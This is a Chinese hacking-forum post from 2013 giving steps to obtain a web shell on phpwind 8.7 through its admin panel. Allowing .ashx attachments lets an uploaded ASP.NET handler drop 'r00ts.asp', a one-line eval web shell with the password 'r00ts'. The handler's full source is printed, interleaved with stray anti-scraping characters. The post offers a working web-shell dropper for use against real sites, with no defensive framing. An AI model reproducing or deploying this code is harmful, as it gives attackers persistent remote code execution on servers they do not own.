找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2063|回复: 0
打印 上一主题 下一主题

phpwind 8.7 后台拿shell

[复制链接]
跳转到指定楼层
楼主
发表于 2013-7-26 12:41:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
首先点开后台地图 然后附件设置 添加一个ashx后缀 2000大小7 E& U6 b' B( B. ]6 A
, Z3 b( S" g% R5 y# Y
群里面我以前扔的那个ashx.txt 下载回来改成fuck.ashx
( P4 V5 D) r& @2 f  P$ L
  d" L. [7 e' s发表文章那边有个附件上传 把ashx扔上去 前提是iis 阿帕奇我还真不知道咋整, }# w. Z9 Q4 F9 L

9 e- f/ H% n& |8 V然后再打开后台地图 附件优化 滑到下面就看到刚上传的ashx1 ^1 P: n7 _- |; r7 g

3 I3 I$ x" S' [打开之后空白 会在目录底下生成r00ts.asp 密码r00ts
1 E6 x' D* L& H% z5 E( ?
+ Q1 ?$ e3 ]: s( o! h3 }9 ~下面是代码:7 r" ^7 k3 S  C/ c6 @
$ Q  L( s  h9 _8 y% V8 e+ P
<%@ WebHandler Language="C#"Class="Handler" %>+ g8 L/ g' U7 N" }3 P( H
using System;8 j6 h6 Y/ _5 G# v2 g
using System.Web;, g* O8 k3 C5 r' y
using System.IO;) S+ y, ~4 R* C" b  K
public class Handler : IHttpHandler {
) N" B- f- m- w  f3 i% y" p* hpublic void ProcessRequest (HttpContext context) {
0 w( W: }5 i- |# p2 r: s, Acontext.Response.ContentType = "text/plain";  f% r; R5 r8 N. C9 @, y
StreamWriter file1= File.CreateText(context.Server.MapPath("r00ts.asp"));
$ r( X4 P& s  K9 N9 ^file1.Write("<%eval request(\"r00ts\")%>");
9 c: a9 \: {- Gfile1.Flush();5 I3 }$ r7 c- B5 j; o
file1.Close();
9 j) g* r- v% @7 x6 z, o6 m$ K}9 R# e* h2 O( Q$ w. e" o
public bool IsReusable {
4 Q. O$ j  _5 C% V7 ?# Aget {
5 ^" r5 H9 H6 _return false;) P: j$ O# ~6 _/ ^' z! D
}
1 \% y# J0 n3 T. |}' U6 O! k. f0 W" S
}
' L2 R7 e& v/ M
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表